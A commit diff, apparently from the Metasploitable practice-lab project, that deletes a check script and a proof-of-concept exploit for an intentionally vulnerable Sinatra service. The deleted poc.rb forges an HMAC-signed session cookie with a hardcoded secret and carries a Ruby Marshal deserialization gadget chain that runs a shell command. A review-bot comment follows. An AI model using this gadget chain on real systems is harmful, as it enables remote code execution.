Delete files that are not needed anymore
parent
541e39430b
commit
418d7f7ae3
@ -9,13 +9,6 @@ Since this is a custom application, the Metasploitable player is required to
|
||||
figure out what the secret is (remotely, not through code reading), and write
|
||||
an exploit from scratch.
|
||||
|
||||
For development purposes, you can use the following scripts to test the
|
||||
vulnerable service:
|
||||
|
||||
* check.rb - This will check if the application is vulnerable.
|
||||
* poc.rb - This will attempt to exploit the application. It will create a
|
||||
file named /tmp/your_id.txt
|
||||
|
||||
==============
|
||||
Usage
|
||||
==============
|
||||
|
@ -1,26 +0,0 @@
|
||||
#!/usr/bin/env ruby
|
||||
|
||||
#
|
||||
# This will check our vulnerable app to see if it's vulnerable or not.
|
||||
# It does so by predicting the hash in the cookie.
|
||||
#
|
||||
|
||||
require 'openssl'
|
||||
require 'cgi'
|
||||
require 'net/http'
|
||||
|
||||
SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
|
||||
|
||||
cli = Net::HTTP.new('127.0.0.1', 8181)
|
||||
req = Net::HTTP::Get.new('/')
|
||||
res = cli.request(req)
|
||||
cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
|
||||
data, hash = cookie.split('--')
|
||||
puts "[*] Found hash: #{hash}"
|
||||
puts "[*] Attempting to recreate the same hash with secret: #{SECRET}"
|
||||
expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data))
|
||||
puts "[*] Predicted hash: #{expected_hash}"
|
||||
|
||||
if expected_hash == hash
|
||||
puts "[*] Yay! we can predict the hash. The server is vulnerable."
|
||||
end
|
@ -1,34 +0,0 @@
|
||||
#!/usr/bin/env ruby
|
||||
|
||||
#
|
||||
# This PoC will inject Ruby code in our vulnerable app.
|
||||
# It will run the system command "id", and save the output in /tmp/your_id.txt
|
||||
#
|
||||
|
||||
require 'openssl'
|
||||
require 'cgi'
|
||||
require 'net/http'
|
||||
|
||||
SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
|
||||
|
||||
module Erubis;class Eruby;end;end
|
||||
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
|
||||
|
||||
erubis = Erubis::Eruby.allocate
|
||||
erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1"
|
||||
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
|
||||
proxy.instance_variable_set :@instance, erubis
|
||||
proxy.instance_variable_set :@method, :result
|
||||
proxy.instance_variable_set :@var, "@result"
|
||||
|
||||
session = { 'session_id' => '', 'exploit' => proxy }
|
||||
|
||||
dump = [ Marshal.dump(session) ].pack('m')
|
||||
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
|
||||
cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
|
||||
|
||||
http = Net::HTTP.new('127.0.0.1', 8181)
|
||||
req = Net::HTTP::Get.new('/')
|
||||
req['Cookie'] = cookie
|
||||
res = http.request(req)
|
||||
puts "Done"
|
@ -13,7 +13,7 @@ directory '/opt/sinatra' do
|
||||
mode '0777'
|
||||
end
|
||||
|
||||
['Gemfile', 'README.txt', 'check.rb', 'poc.rb', 'start.sh', 'server.rb'].each do |fname|
|
||||
['Gemfile', 'README.txt', 'start.sh', 'server.rb'].each do |fname|
|
||||
cookbook_file "/opt/sinatra/#{fname}" do
|
||||
source "sinatra/#{fname}"
|
||||
mode '0777'
|
||||
|
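Review bot: Dropping `check.rb` and `poc.rb` from the file list only stops the recipe from deploying them; a node that was converged before this commit keeps both files under /opt/sinatra, and both embed the signing secret that the README says the player must discover remotely. If boxes are ever re-provisioned in place rather than rebuilt from scratch, I would add an explicit cleanup next to the loop, e.g. `['check.rb', 'poc.rb'].each { |f| file("/opt/sinatra/#{f}") { action :delete } }`. The `each` and `cookbook_file` blocks continue past the end of this hunk, so I cannot see whether anything after them already handles this.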